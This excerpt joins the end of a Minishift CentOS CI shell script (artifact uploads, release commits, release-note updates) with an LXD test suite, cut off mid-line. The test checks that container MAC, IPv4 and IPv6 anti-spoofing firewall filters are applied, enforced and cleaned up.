cd openshift-docs
mkdir minishift
cd minishift
cp $1 .
tar -xvf minishift-adoc.tar --strip 1
cat _topic_map.yml >> ../_topic_map.yml
cd ..
rake build
cd ..
}
function perform_artifacts_upload() {
set +x
# For PR build, GIT_BRANCH is set to branch name other than origin/master
if [[ "$GIT_BRANCH" = "origin/master" ]]; then
mkdir -p minishift/master/$BUILD_NUMBER/ minishift/master/$LATEST
cp -r out/*-amd64 minishift/master/$BUILD_NUMBER/
cp -r out/*-amd64 minishift/master/$LATEST/
# http://stackoverflow.com/a/22908437/1120530; Using --relative as --rsync-path not working
RSYNC_PASSWORD=$1 rsync -av --relative minishift/master [email protected]::minishift/
echo "Find Artifacts here http://artifacts.ci.centos.org/minishift/minishift/master/$BUILD_NUMBER ."
else
mkdir -p minishift/pr/$ghprbPullId/
cp -r out/*-amd64 minishift/pr/$ghprbPullId/
# http://stackoverflow.com/a/22908437/1120530; Using --relative as --rsync-path not working
RSYNC_PASSWORD=$1 rsync -av --delete --relative minishift/pr/$ghprbPullId/ [email protected]::minishift/
echo "Find Artifacts here http://artifacts.ci.centos.org/minishift/minishift/pr/$ghprbPullId ."
fi
}
function docs_tar_upload() {
set +x
version=$(cat docs/source/variables.adoc | cut -d' ' -f2 | head -n1)
mkdir -p minishift/docs/$version minishift/docs/$LATEST
cp docs/build/minishift-adoc.tar minishift/docs/$version/
cp docs/build/minishift-adoc.tar minishift/docs/$LATEST/
# http://stackoverflow.com/a/22908437/1120530; Using --relative as --rsync-path not working
RSYNC_PASSWORD=$1 rsync -av --relative minishift/docs [email protected]::minishift/
echo "Find docs tar here http://artifacts.ci.centos.org/minishift/minishift/docs/$LATEST."
}
function create_release_commit() {
# Create master branch as git clone in CI doesn't create it
git checkout -b master
# Bump version and commit
sed -i "s|MINISHIFT_VERSION = .*|MINISHIFT_VERSION = $RELEASE_VERSION|" Makefile
git add Makefile
git commit -m "cut v$RELEASE_VERSION"
git push https://$REPO_OWNER:[email protected]/$REPO_OWNER/minishift master
}
function add_release_notes() {
release_id=$(curl -s "https://api.github.com/repos/${REPO_OWNER}/minishift/releases" | jq --arg release "v$RELEASE_VERSION" -r ' .[] | if .name == $release then .id else empty end')
if [[ "$release_id" != "" ]]; then
MILESTONE_ID=`curl -s 'https://api.github.com/repos/minishift/minishift/milestones?state=all&page=1&per_page=100' | jq --arg version "v$RELEASE_VERSION" -r ' .[] | if .title == $version then .number else empty end'`
if [[ "$MILESTONE_ID" != "" ]]; then
# Generate required json payload for release note
./scripts/release/issue-list.sh -r minishift -m $MILESTONE_ID | jq -Rn 'inputs + "\n"' | jq -s '{body: add }' > json_payload.json
# Add release notes
curl -H "Content-Type: application/json" -H "Authorization: token $GITHUB_TOKEN" \
--data @json_payload.json https://api.github.com/repos/${REPO_OWNER}/minishift/releases/$release_id
echo "Release notes of Minishift v$RELEASE_VERSION has been successfully updated. Find the release notes here https://github.com/${REPO_OWNER}/minishift/releases/tag/v$RELEASE_VERSION."
else
echo "Failed to get milestone ID for Minishift v$RELEASE_VERSION. Use manual approach to update the release notes here https://github.com/${REPO_OWNER}/minishift/releases/tag/v$RELEASE_VERSION."
fi
else
return 1
fi
}
function setup_build_environment() {
load_jenkins_vars;
prepare_ci_user;
install_core_deps;
install_kvm_virt;
install_docker;
install_golang;
prepare_for_proxy;
runuser -l minishift_ci -c "/bin/bash centos_ci.sh"
}
#######################################################################
# Publish Minishift documentation after integrating it with
# OpenShift documentation
# Arguments:
# $1 - Repo Owner
# $2 - Branch name
# $3 - Location on the artifact server where documentation is hosted
######################################################################
function perform_docs_publish() {
REPO="https://github.com/$1/minishift"
git remote add remote-repo $REPO
git fetch remote-repo
git checkout -b docs-branch --track remote-repo/$2
git log -n 1 # Display last commit in log as reference
install_docs_prerequisite_packages;
make gen_adoc_tar
build_openshift_origin_docs $(pwd)/docs/build/minishift-adoc.tar;
mkdir -p $3
cp -r openshift-docs/_preview/openshift-origin $3/ # Copy the openshift-origin
# http://stackoverflow.com/a/22908437/1120530; Using --relative as --rsync-path not working
RSYNC_PASSWORD=$RSYNC_PASSWORD rsync -av --delete --relative $3/ [email protected]::minishift/
echo "Minishift documentation is hosted at http://artifacts.ci.centos.org/minishift/$3/openshift-origin/latest/minishift/index.html"
}
function prepare_for_proxy() {
export INTEGRATION_PROXY_CUSTOM_PORT=8181 # needs to be an unused port
firewall-cmd --zone=public --add-port=$INTEGRATION_PROXY_CUSTOM_PORT/tcp;
}
function perform_release() {
# Test everything before bumping the version
make prerelease
exit_on_failure "$?" "Pre-release tests failed."
MINISHIFT_VM_DRIVER=kvm make integration_pr
exit_on_failure "$?" "Integration tests failed."
make link_check_docs # Test docs builds and all links are valid
exit_on_failure "$?" "Documentation build failed."
create_release_commit
exit_on_failure "$?" "Unable to create release commit."
make release
exit_on_failure "$?" "Failed to release Minishift v$RELEASE_VERSION. Try to release manually."
echo "Minishift v$RELEASE_VERSION has been successfully released. Find the latest release here https://github.com/$REPO_OWNER/minishift/releases/tag/v$RELEASE_VERSION."
add_release_notes;
exit_on_failure "$?" "Failed to update release notes of Minishift v$RELEASE_VERSION. Try to manually update the release notes here - https://github.com/${REPO_OWNER}/minishift/releases/tag/v$RELEASE_VERSION."
make gen_adoc_tar
exit_on_failure "$?" "Documentation tarball build failed."
docs_tar_upload $1
exit_on_failure "$?" "Failed to upload tar bundle for doc.openshift.org."
# Notify Minibot
MESSAGE="Minishift v$RELEASE_VERSION successfully released by https://ci.centos.org/job/minishift-release/$BUILD_NUMBER."
URL="https://github.com/$REPO_OWNER/minishift/releases/tag/v$RELEASE_VERSION"
# Do not abort build if minibot service is inaccessible
curl http://minibot.19cf262c.svc.dockerapp.io:9009/hubot/centosci -H "Content-Type: application/json" -d '{"payload":{"status":"success","message":'"\"$MESSAGE\""',"url":'"\"$URL\""'}}' || true
}
function perform_pr() {
make prerelease synopsis_docs link_check_docs
MINISHIFT_VM_DRIVER=kvm make integration_pr
perform_artifacts_upload $1;
}
function perform_master() {
make prerelease synopsis_docs link_check_docs
MINISHIFT_VM_DRIVER=kvm make integration_all
perform_docs_publish "minishift" "master" "minishift/docs/master";
perform_artifacts_upload $1;
}
function perform_nightly() {
make prerelease synopsis_docs link_check_docs
MINISHIFT_ISO_URL=$1 MINISHIFT_VM_DRIVER=kvm make integration_all
}
if [[ "$UID" = 0 ]]; then
setup_build_environment;
else
source ~/jenkins-env # Source environment variables for minishift_ci user
RSYNC_PASSWORD=$(echo $CICO_API_KEY | cut -d'-' -f1-2)
# Set Terminal
export TERM=xterm-256color
# Add git a/c identity
git config --global user.email "[email protected]"
git config --global user.name "Minishift Bot"
# Export GITHUB_ACCESS_TOKEN
export GITHUB_ACCESS_TOKEN=$GITHUB_TOKEN
prepare_repo;
setup_kvm_docker_machine_driver;
# Navigate to the repo
cd $GOPATH/src/github.com/minishift/minishift
if [[ "$JOB_NAME" = "minishift-docs" ]]; then
# REPO and BRANCH variables are populated via https://ci.centos.org/job/minishift-docs
REPO_OWNER=$(echo $REPO | cut -d"/" -f4)
perform_docs_publish "$REPO_OWNER" "$BRANCH" "minishift/docs/ondemand/$REPO_OWNER-$BRANCH";
elif [[ "$JOB_NAME" = "minishift-release" ]]; then
perform_release $RSYNC_PASSWORD;
elif [[ "$JOB_NAME" = "minishift-nightly-b2d" ]]; then
perform_nightly "b2d";
elif [[ "$JOB_NAME" = "minishift-nightly-minikube" ]]; then
perform_nightly "minikube";
elif [[ "$JOB_NAME" = "minishift-nightly-centos" ]]; then
perform_nightly "centos";
elif [[ "$JOB_NAME" = "minishift" ]]; then # Master job
perform_master $RSYNC_PASSWORD;
else # PR job
perform_pr $RSYNC_PASSWORD;
fi
fi
|
praveenkumar/minishift
|
centos_ci.sh
|
Shell
|
apache-2.0
| 14,722 |
test_container_devices_nic_bridged_filtering() {
ensure_import_testimage
ensure_has_localhost_remote "${LXD_ADDR}"
firewallDriver=$(lxc info | awk -F ":" '/firewall:/{gsub(/ /, "", $0); print $2}')
if [ "$firewallDriver" != "xtables" ] && [ "$firewallDriver" != "nftables" ]; then
echo "Unrecognised firewall driver: ${firewallDriver}"
false
fi
# Record how many nics we started with.
startNicCount=$(find /sys/class/net | wc -l)
ctPrefix="nt$$"
brName="lxdt$$"
# Standard bridge with random subnet and a bunch of options.
lxc network create "${brName}"
lxc network set "${brName}" dns.mode managed
lxc network set "${brName}" dns.domain blah
lxc network set "${brName}" ipv4.nat true
# Routing is required for container to container traffic as filtering requires br_netfilter module.
# This then causes bridged traffic to go through the FORWARD chain in iptables.
lxc network set "${brName}" ipv4.routing true
lxc network set "${brName}" ipv6.routing true
lxc network set "${brName}" ipv6.dhcp.stateful true
lxc network set "${brName}" bridge.hwaddr 00:11:22:33:44:55
lxc network set "${brName}" ipv4.address 192.0.2.1/24
lxc network set "${brName}" ipv6.address 2001:db8::1/64
[ "$(cat /sys/class/net/${brName}/address)" = "00:11:22:33:44:55" ]
# Create profile for new containers.
lxc profile copy default "${ctPrefix}"
# Modify profile nictype and parent in atomic operation to ensure validation passes.
lxc profile show "${ctPrefix}" | sed "s/nictype: p2p/nictype: bridged\\n parent: ${brName}/" | lxc profile edit "${ctPrefix}"
# Launch first container.
lxc init testimage "${ctPrefix}A" -p "${ctPrefix}"
lxc config device add "${ctPrefix}A" eth0 nic nictype=nic name=eth0 nictype=bridged parent="${brName}"
lxc start "${ctPrefix}A"
lxc exec "${ctPrefix}A" -- ip a add 192.0.2.2/24 dev eth0
# Launch second container.
lxc init testimage "${ctPrefix}B" -p "${ctPrefix}"
lxc config device add "${ctPrefix}B" eth0 nic nictype=nic name=eth0 nictype=bridged parent="${brName}"
lxc start "${ctPrefix}B"
lxc exec "${ctPrefix}B" -- ip a add 192.0.2.3/24 dev eth0
# Check basic connectivity without any filtering.
lxc exec "${ctPrefix}A" -- ping -c2 -W1 192.0.2.1
lxc exec "${ctPrefix}A" -- ping -c2 -W1 192.0.2.3
# Enable MAC filtering on CT A and test.
lxc config device set "${ctPrefix}A" eth0 security.mac_filtering true
ctAMAC=$(lxc config get "${ctPrefix}A" volatile.eth0.hwaddr)
# Check MAC filter is present in firewall.
ctAHost=$(lxc config get "${ctPrefix}A" volatile.eth0.host_name)
if [ "$firewallDriver" = "xtables" ]; then
if ! ebtables --concurrent -L --Lmac2 --Lx | grep -e "-s ! ${ctAMAC} -i ${ctAHost} -j DROP" ; then
echo "MAC filter not applied as part of mac_filtering in ebtables"
false
fi
else
macHex=$(echo "${ctAMAC}" |sed "s/://g")
macDec=$(printf "%d" 0x"${macHex}")
for table in "in" "fwd"
do
if ! nft -nn list chain bridge lxd "${table}.${ctPrefix}A.eth0" | grep -e "iifname \"${ctAHost}\" ether saddr != ${ctAMAC} drop"; then
echo "MAC filter not applied as part of mac_filtering in nftables (${table}.${ctPrefix}A.eth0)"
false
fi
if ! nft -nn list chain bridge lxd "${table}.${ctPrefix}A.eth0" | grep -e "iifname \"${ctAHost}\" arp saddr ether != ${ctAMAC} drop"; then
echo "MAC ARP filter not applied as part of mac_filtering in nftables (${table}.${ctPrefix}A.eth0)"
false
fi
if ! nft -nn list chain bridge lxd "${table}.${ctPrefix}A.eth0" | grep "iifname \"${ctAHost}\" icmpv6 type 136 @nh,528,48 != ${macDec} drop"; then
echo "MAC NDP filter not applied as part of mac_filtering in nftables (${table}.${ctPrefix}A.eth0)"
false
fi
done
fi
# Setup fake MAC inside container.
lxc exec "${ctPrefix}A" -- ip link set dev eth0 address 00:11:22:33:44:56 up
# Check that ping is no longer working (i.e its filtered after fake MAC setup).
if lxc exec "${ctPrefix}A" -- ping -c2 -W1 192.0.2.1; then
echo "MAC filter not working to host"
false
fi
# Check that ping is no longer working (i.e its filtered after fake MAC setup).
if lxc exec "${ctPrefix}A" -- ping -c2 -W1 192.0.2.3; then
echo "MAC filter not working to other container"
false
fi
# Restore real MAC
lxc exec "${ctPrefix}A" -- ip link set dev eth0 address "${ctAMAC}" up
# Check basic connectivity with MAC filtering but real MAC configured.
lxc exec "${ctPrefix}A" -- ping -c2 -W1 192.0.2.1
lxc exec "${ctPrefix}A" -- ping -c2 -W1 192.0.2.3
# Stop CT A and check filters are cleaned up.
lxc stop -f "${ctPrefix}A"
if [ "$firewallDriver" = "xtables" ]; then
if ebtables --concurrent -L --Lmac2 --Lx | grep -e "-s ! ${ctAMAC} -i ${ctAHost} -j DROP" ; then
echo "MAC filter still applied as part of mac_filtering in ebtables"
false
fi
else
for table in "in" "fwd"
do
if nft -nn list chain bridge lxd "${table}.${ctPrefix}A.eth0" | grep -e "${ctAHost}"; then
echo "MAC filter still applied as part of mac_filtering in nftables (${table}.${ctPrefix}A.eth0)"
false
fi
done
fi
# Add a fake IPv4 and check connectivity
lxc start "${ctPrefix}A"
lxc exec "${ctPrefix}A" -- ip link set dev eth0 address "${ctAMAC}" up
lxc exec "${ctPrefix}A" -- ip a add 192.0.2.254/24 dev eth0
lxc exec "${ctPrefix}A" -- ping -c2 -W1 192.0.2.1
lxc exec "${ctPrefix}A" -- ping -c2 -W1 192.0.2.3
# Enable IPv4 filtering on CT A and test (disable security.mac_filtering to check its applied too).
lxc config device set "${ctPrefix}A" eth0 ipv4.address 192.0.2.2
lxc config device set "${ctPrefix}A" eth0 security.mac_filtering false
lxc config device set "${ctPrefix}A" eth0 security.ipv4_filtering true
# Check MAC and IPv4 filter is present in firewall.
ctAHost=$(lxc config get "${ctPrefix}A" volatile.eth0.host_name)
if [ "$firewallDriver" = "xtables" ]; then
if ! ebtables --concurrent -L --Lmac2 --Lx | grep -e "-s ! ${ctAMAC} -i ${ctAHost} -j DROP" ; then
echo "MAC filter not applied as part of ipv4_filtering in ebtables"
false
fi
if ! ebtables --concurrent -L --Lmac2 --Lx | grep -e "192.0.2.2" ; then
echo "IPv4 filter not applied as part of ipv4_filtering in ebtables"
false
fi
else
for table in "in" "fwd"
do
if ! nft -nn list chain bridge lxd "${table}.${ctPrefix}A.eth0" | grep -e "iifname \"${ctAHost}\" ether saddr != ${ctAMAC} drop"; then
echo "MAC filter not applied as part of ipv4_filtering in nftables (${table}.${ctPrefix}A.eth0)"
false
fi
if ! nft -nn list chain bridge lxd "${table}.${ctPrefix}A.eth0" | grep -e "iifname \"${ctAHost}\" arp saddr ether != ${ctAMAC} drop"; then
echo "MAC ARP filter not applied as part of ipv4_filtering in nftables (${table}.${ctPrefix}A.eth0)"
false
fi
if ! nft -nn list chain bridge lxd "${table}.${ctPrefix}A.eth0" | grep -e "iifname \"${ctAHost}\" ip saddr != 192.0.2.2 drop"; then
echo "IPv4 filter not applied as part of ipv4_filtering in nftables (${table}.${ctPrefix}A.eth0)"
false
fi
if ! nft -nn list chain bridge lxd "${table}.${ctPrefix}A.eth0" | grep -e "iifname \"${ctAHost}\" arp saddr ip != 192.0.2.2 drop"; then
echo "IPv4 ARP filter not applied as part of ipv4_filtering in nftables (${table}.${ctPrefix}A.eth0)"
false
fi
done
fi
# Check DHCPv4 allocation still works.
lxc exec "${ctPrefix}A" -- ip link set dev eth0 address "${ctAMAC}" up
lxc exec "${ctPrefix}A" -- udhcpc -i eth0 -n -q
lxc exec "${ctPrefix}A" -- ip a flush dev eth0
lxc exec "${ctPrefix}A" -- ip a add 192.0.2.2/24 dev eth0
# Check basic connectivity with IPv4 filtering and real IPs configured.
lxc exec "${ctPrefix}A" -- ping -c2 -W1 192.0.2.1
lxc exec "${ctPrefix}A" -- ping -c2 -W1 192.0.2.3
# Add a fake IP
lxc exec "${ctPrefix}A" -- ip a flush dev eth0
lxc exec "${ctPrefix}A" -- ip a add 192.0.2.254/24 dev eth0
# Check that ping is no longer working (i.e its filtered after fake IP setup).
if lxc exec "${ctPrefix}A" -- ping -c2 -W1 192.0.2.1; then
echo "IPv4 filter not working to host"
false
fi
# Check that ping is no longer working (i.e its filtered after fake IP setup).
if lxc exec "${ctPrefix}A" -- ping -c2 -W1 192.0.2.3; then
echo "IPv4 filter not working to other container"
false
fi
# Stop CT A and check filters are cleaned up in firewall.
lxc stop -f "${ctPrefix}A"
if [ "$firewallDriver" = "xtables" ]; then
if ebtables --concurrent -L --Lmac2 --Lx | grep -e "${ctAHost}" ; then
echo "IPv4 filter still applied as part of ipv4_filtering in ebtables"
false
fi
else
for table in "in" "fwd"
do
if nft -nn list chain bridge lxd "${table}.${ctPrefix}A.eth0" | grep -e "${ctAHost}"; then
echo "IPv4 filter still applied as part of ipv4_filtering in nftables (${table}.${ctPrefix}A.eth0)"
false
fi
done
fi
# Remove static IP and check IP filter works with previous DHCP lease.
rm "${LXD_DIR}/networks/${brName}/dnsmasq.hosts/${ctPrefix}A"
lxc config device unset "${ctPrefix}A" eth0 ipv4.address
lxc start "${ctPrefix}A"
if ! grep "192.0.2.2" "${LXD_DIR}/networks/${brName}/dnsmasq.hosts/${ctPrefix}A" ; then
echo "dnsmasq host config doesnt contain previous lease as static IPv4 config"
false
fi
lxc stop -f "${ctPrefix}A"
lxc config device set "${ctPrefix}A" eth0 security.ipv4_filtering false
rm "${LXD_DIR}/networks/${brName}/dnsmasq.hosts/${ctPrefix}A"
# Simulate 192.0.2.2 being used by another container, next free IP is 192.0.2.3
kill "$(grep ^pid "${LXD_DIR}"/networks/"${brName}"/dnsmasq.pid | cut -d' ' -f2)"
echo "$(date --date="1hour" +%s) 00:16:3e:55:4c:fd 192.0.2.2 c1 ff:6f:c3:ab:c5:00:02:00:00:ab:11:f8:5c:3d:73:db:b2:6a:06" > "${LXD_DIR}/networks/${brName}/dnsmasq.leases"
shutdown_lxd "${LXD_DIR}"
respawn_lxd "${LXD_DIR}" true
lxc config device set "${ctPrefix}A" eth0 security.ipv4_filtering true
lxc start "${ctPrefix}A"
if ! grep "192.0.2.3" "${LXD_DIR}/networks/${brName}/dnsmasq.hosts/${ctPrefix}A" ; then
echo "dnsmasq host config doesnt contain sequentially allocated static IPv4 config"
false
fi
# Simulate changing DHCPv4 ranges.
lxc stop -f "${ctPrefix}A"
lxc network set "${brName}" ipv4.dhcp.ranges "192.0.2.100-192.0.2.110"
lxc start "${ctPrefix}A"
if ! grep "192.0.2.100" "${LXD_DIR}/networks/${brName}/dnsmasq.hosts/${ctPrefix}A" ; then
echo "dnsmasq host config doesnt contain sequentially range allocated static IPv4 config"
false
fi
# Make sure br_netfilter is loaded, needed for IPv6 filtering.
modprobe br_netfilter || true
if ! grep 1 /proc/sys/net/bridge/bridge-nf-call-ip6tables ; then
echo "br_netfilter didn't load, skipping IPv6 filter checks"
lxc delete -f "${ctPrefix}A"
lxc delete -f "${ctPrefix}B"
lxc profile delete "${ctPrefix}"
lxc network delete "${brName}"
return
fi
# Add a fake IPv6 and check connectivity
lxc exec "${ctPrefix}B" -- ip -6 a add 2001:db8::3/64 dev eth0
lxc exec "${ctPrefix}A" -- ip link set dev eth0 address "${ctAMAC}" up
lxc exec "${ctPrefix}A" -- ip -6 a add 2001:db8::254 dev eth0
sleep 2 # Wait for DAD.
lxc exec "${ctPrefix}A" -- ping6 -c2 -W1 2001:db8::1
lxc exec "${ctPrefix}A" -- ping6 -c2 -W1 2001:db8::3
# Enable IPv6 filtering on CT A and test (disable security.mac_filtering to check its applied too).
lxc config device set "${ctPrefix}A" eth0 ipv6.address 2001:db8::2
lxc config device set "${ctPrefix}A" eth0 security.mac_filtering false
lxc config device set "${ctPrefix}A" eth0 security.ipv6_filtering true
# Check MAC filter is present in firewall.
ctAHost=$(lxc config get "${ctPrefix}A" volatile.eth0.host_name)
macHex=$(echo "${ctAMAC}" |sed "s/://g")
if [ "$firewallDriver" = "xtables" ]; then
if ! ebtables --concurrent -L --Lmac2 --Lx | grep -e "-s ! ${ctAMAC} -i ${ctAHost} -j DROP" ; then
echo "MAC filter not applied as part of ipv6_filtering in ebtables"
false
fi
# Check NDP MAC filter is present in ip6tables.
if ! ip6tables -S -w -t filter | grep -e "${macHex}" ; then
echo "MAC NDP filter not applied as part of ipv6_filtering in ip6tables"
false
fi
# Check NDP IPv6 filter is present in ip6tables.
if ! ip6tables -S -w -t filter | grep -e "20010db8000000000000000000000002" ; then
echo "IPv6 NDP filter not applied as part of ipv6_filtering in ip6tables"
false
fi
# Check IPv6 filter is present in ebtables.
if ! ebtables --concurrent -L --Lmac2 --Lx | grep -e "2001:db8::2" ; then
echo "IPv6 filter not applied as part of ipv6_filtering in ebtables"
false
fi
# Check IPv6 RA filter is present in ebtables.
if ! ebtables --concurrent -L --Lmac2 --Lx | grep -e "-i ${ctAHost} --ip6-proto ipv6-icmp --ip6-icmp-type router-advertisement -j DROP" ; then
echo "IPv6 RA filter not applied as part of ipv6_filtering in ebtables"
false
fi
else
macDec=$(printf "%d" 0x"${macHex}")
ipv6Dec="42540766411282592856903984951653826562"
for table in "in" "fwd"
do
if ! nft -nn list chain bridge lxd "${table}.${ctPrefix}A.eth0" | grep "iifname \"${ctAHost}\" ether saddr != ${ctAMAC} drop"; then
echo "MAC filter not applied as part of ipv6_filtering in nftables (${table}.${ctPrefix}A.eth0)"
false
fi
if ! nft -nn list chain bridge lxd "${table}.${ctPrefix}A.eth0" | grep "iifname \"${ctAHost}\" arp saddr ether != ${ctAMAC} drop"; then
echo "MAC ARP filter not applied as part of ipv6_filtering in nftables (${table}.${ctPrefix}A.eth0)"
false
fi
if ! nft -nn list chain bridge lxd "${table}.${ctPrefix}A.eth0" | grep "iifname \"${ctAHost}\" icmpv6 type 136 @nh,528,48 != ${macDec} drop"; then
echo "MAC NDP filter not applied as part of ipv6_filtering in nftables (${table}.${ctPrefix}A.eth0)"
false
fi
if ! nft -nn list chain bridge lxd "${table}.${ctPrefix}A.eth0" | grep "iifname \"${ctAHost}\" icmpv6 type 136 @nh,384,128 != ${ipv6Dec} drop"; then
echo "IPv6 NDP filter not applied as part of ipv6_filtering in nftables (${table}.${ctPrefix}A.eth0)"
false
fi
if ! nft -nn list chain bridge lxd "${table}.${ctPrefix}A.eth0" | grep "iifname \"${ctAHost}\" ip6 saddr != 2001:db8::2 drop"; then
echo "IPv6 filter not applied as part of ipv6_filtering in nftables (${table}.${ctPrefix}A.eth0)"
false
fi
if ! nft -nn list chain bridge lxd "${table}.${ctPrefix}A.eth0" | grep -e "iifname \"${ctAHost}\" icmpv6 type 134 drop"; then
echo "IPv6 RA filter not applied as part of ipv6_filtering in nftables (${table}.${ctPrefix}A.eth0)"
false
fi
done
fi
# Check DHCPv6 allocation still works (if udhcpc6 is in busybox image).
lxc exec "${ctPrefix}A" -- ip link set dev eth0 address "${ctAMAC}" up
busyboxUdhcpc6=1
if ! lxc exec "${ctPrefix}A" -- busybox --list | grep udhcpc6 ; then
busyboxUdhcpc6=0
fi
if [ "$busyboxUdhcpc6" = "1" ]; then
lxc exec "${ctPrefix}A" -- udhcpc6 -i eth0 -n -q 2>&1 | grep 'IPv6 obtained'
fi
lxc exec "${ctPrefix}A" -- ip -6 a flush dev eth0
lxc exec "${ctPrefix}A" -- ip -6 a add 2001:db8::2/64 dev eth0
sleep 2 # Wait for DAD.
# Check basic connectivity with IPv6 filtering and real IPs configured.
lxc exec "${ctPrefix}A" -- ping6 -c2 -W1 2001:db8::2
lxc exec "${ctPrefix}A" -- ping6 -c2 -W1 2001:db8::3
# Add a fake IP
lxc exec "${ctPrefix}A" -- ip -6 a flush dev eth0
lxc exec "${ctPrefix}A" -- ip -6 a add 2001:db8::254/64 dev eth0
# Check that ping is no longer working (i.e its filtered after fake IP setup).
if lxc exec "${ctPrefix}A" -- ping6 -c2 -W1 2001:db8::2; then
echo "IPv6 filter not working to host"
false
fi
# Check that ping is no longer working (i.e its filtered after fake IP setup).
if lxc exec "${ctPrefix}A" -- ping6 -c2 -W1 2001:db8::3; then
echo "IPv6 filter not working to other container"
false
fi
# Stop CT A and check filters are cleaned up.
lxc stop -f "${ctPrefix}A"
if [ "$firewallDriver" = "xtables" ]; then
if ebtables --concurrent -L --Lmac2 --Lx | grep -e "${ctAHost}" ; then
echo "IPv6 filter still applied as part of ipv6_filtering in ebtables"
false
fi
else
for table in "in" "fwd"
do
if nft -nn list chain bridge lxd "${table}.${ctPrefix}A.eth0" | grep -e "${ctAHost}"; then
echo "IPv6 filter still applied as part of ipv4_filtering in nftables (${table}.${ctPrefix}A.eth0)"
false
fi
done
fi
# Check volatile cleanup on stop.
if lxc config show "${ctPrefix}A" | grep volatile.eth0 | grep -v volatile.eth0.hwaddr ; then
echo "unexpected volatile key remains"
false
fi
# Set static MAC so that SLAAC address is derived predictably and check it is applied to static config.
lxc config device unset "${ctPrefix}A" eth0 ipv6.address
lxc config device set "${ctPrefix}A" eth0 hwaddr 00:16:3e:92:f3:c1
lxc config device set "${ctPrefix}A" eth0 security.ipv6_filtering false
rm "${LXD_DIR}/networks/${brName}/dnsmasq.hosts/${ctPrefix}A"
lxc config device set "${ctPrefix}A" eth0 security.ipv6_filtering true
lxc start "${ctPrefix}A"
if ! grep "\\[2001:db8::216:3eff:fe92:f3c1\\]" "${LXD_DIR}/networks/${brName}/dnsmasq.hosts/${ctPrefix}A" ; then
echo "dnsmasq host config doesnt contain dynamically allocated static IPv6 config"
false
fi
lxc stop -f "${ctPrefix}A"
lxc config device set "${ctPrefix}A" eth0 security.ipv6_filtering false
rm "${LXD_DIR}/networks/${brName}/dnsmasq.hosts/${ctPrefix}A"
# Simulate SLAAC 2001:db8::216:3eff:fe92:f3c1 being used by another container, next free IP is 2001:db8::2
kill "$(grep ^pid "${LXD_DIR}"/networks/"${brName}"/dnsmasq.pid | cut -d' ' -f2)"
echo "$(date --date="1hour" +%s) 1875094469 2001:db8::216:3eff:fe92:f3c1 c1 00:02:00:00:ab:11:f8:5c:3d:73:db:b2:6a:06" > "${LXD_DIR}/networks/${brName}/dnsmasq.leases"
shutdown_lxd "${LXD_DIR}"
respawn_lxd "${LXD_DIR}" true
lxc config device set "${ctPrefix}A" eth0 security.ipv6_filtering true
lxc start "${ctPrefix}A"
if ! grep "\\[2001:db8::2\\]" "${LXD_DIR}/networks/${brName}/dnsmasq.hosts/${ctPrefix}A" ; then
echo "dnsmasq host config doesnt contain sequentially allocated static IPv6 config"
false
fi
lxc stop -f "${ctPrefix}A"
lxc stop -f "${ctPrefix}B"
lxc delete -f "${ctPrefix}A"
lxc delete -f "${ctPrefix}B"
# Check filtering works with non-DHCP statically defined IPs and a bridge with no IP address and DHCP disabled.
lxc network set "${brName}" ipv4.dhcp false
lxc network set "${brName}" ipv4.address none
lxc network set "${brName}" ipv6.dhcp false
lxc network set "${brName}" ipv6.address none
lxc network set "${brName}" ipv6.dhcp.stateful false
lxc init testimage "${ctPrefix}A" -p "${ctPrefix}"
lxc config device add "${ctPrefix}A" eth0 nic \
nictype=nic \
name=eth0 \
nictype=bridged \
parent="${brName}" \
ipv4.address=192.0.2.2 \
ipv6.address=2001:db8::2 \
security.ipv4_filtering=true \
security.ipv6_filtering=true
lxc start "${ctPrefix}A"
# Check MAC filter is present in ebtables.
ctAHost=$(lxc config get "${ctPrefix}A" volatile.eth0.host_name)
ctAMAC=$(lxc config get "${ctPrefix}A" volatile.eth0.hwaddr)
macHex=$(echo "${ctAMAC}" |sed "s/://g")
if [ "$firewallDriver" = "xtables" ]; then
# Check MAC filter is present in ebtables.
if ! ebtables --concurrent -L --Lmac2 --Lx | grep -e "-s ! ${ctAMAC} -i ${ctAHost} -j DROP" ; then
echo "MAC filter not applied as part of ipv4_filtering in ebtables"
false
fi
# Check MAC NDP filter is present in ip6tables.
if ! ip6tables -S -w -t filter | grep -e "${macHex}" ; then
echo "MAC NDP ip6tables filter not applied as part of ipv6_filtering in ip6tables"
false
fi
# Check IPv4 filter is present in ebtables.
if ! ebtables --concurrent -L --Lmac2 --Lx | grep -e "192.0.2.2" ; then
echo "IPv4 filter not applied as part of ipv4_filtering in ebtables"
false
fi
# Check IPv6 filter is present in ebtables.
if ! ebtables --concurrent -L --Lmac2 --Lx | grep -e "2001:db8::2" ; then
echo "IPv6 filter not applied as part of ipv6_filtering in ebtables"
false
fi
# Check IPv6 filter is present in ip6tables.
if ! ip6tables -S -w -t filter | grep -e "20010db8000000000000000000000002" ; then
echo "IPv6 filter not applied as part of ipv6_filtering in ip6tables"
false
fi
else
macDec=$(printf "%d" 0x"${macHex}")
ipv6Dec="42540766411282592856903984951653826562"
for table in "in" "fwd"
do
if ! nft -nn list chain bridge lxd "${table}.${ctPrefix}A.eth0" | grep "iifname \"${ctAHost}\" ether saddr != ${ctAMAC} drop"; then
echo "MAC filter not applied as part of ipv4_filtering in nftables (${table}.${ctPrefix}A.eth0)"
false
fi
if ! nft -nn list chain bridge lxd "${table}.${ctPrefix}A.eth0" | grep "iifname \"${ctAHost}\" arp saddr ether != ${ctAMAC} drop"; then
echo "MAC ARP filter not applied as part of ipv4_filtering in nftables (${table}.${ctPrefix}A.eth0)"
false
fi
if ! nft -nn list chain bridge lxd "${table}.${ctPrefix}A.eth0" | grep "iifname \"${ctAHost}\" icmpv6 type 136 @nh,528,48 != ${macDec} drop"; then
echo "MAC NDP filter not applied as part of ipv6_filtering in nftables (${table}.${ctPrefix}A.eth0)"
false
fi
if ! nft -nn list chain bridge lxd "${table}.${ctPrefix}A.eth0" | grep "iifname \"${ctAHost}\" icmpv6 type 136 @nh,384,128 != ${ipv6Dec} drop"; then
echo "IPv6 NDP filter not applied as part of ipv6_filtering in nftables (${table}.${ctPrefix}A.eth0)"
false
fi
if ! nft -nn list chain bridge lxd "${table}.${ctPrefix}A.eth0" | grep "iifname \"${ctAHost}\" ip6 saddr != 2001:db8::2 drop"; then
echo "IPv6 filter not applied as part of ipv6_filtering in nftables (${table}.${ctPrefix}A.eth0)"
false
fi
done
fi
# Check that you cannot remove static IPs with filtering enabled and DHCP disabled.
if lxc config device unset "${ctPrefix}A" eth0 ipv4.address ; then
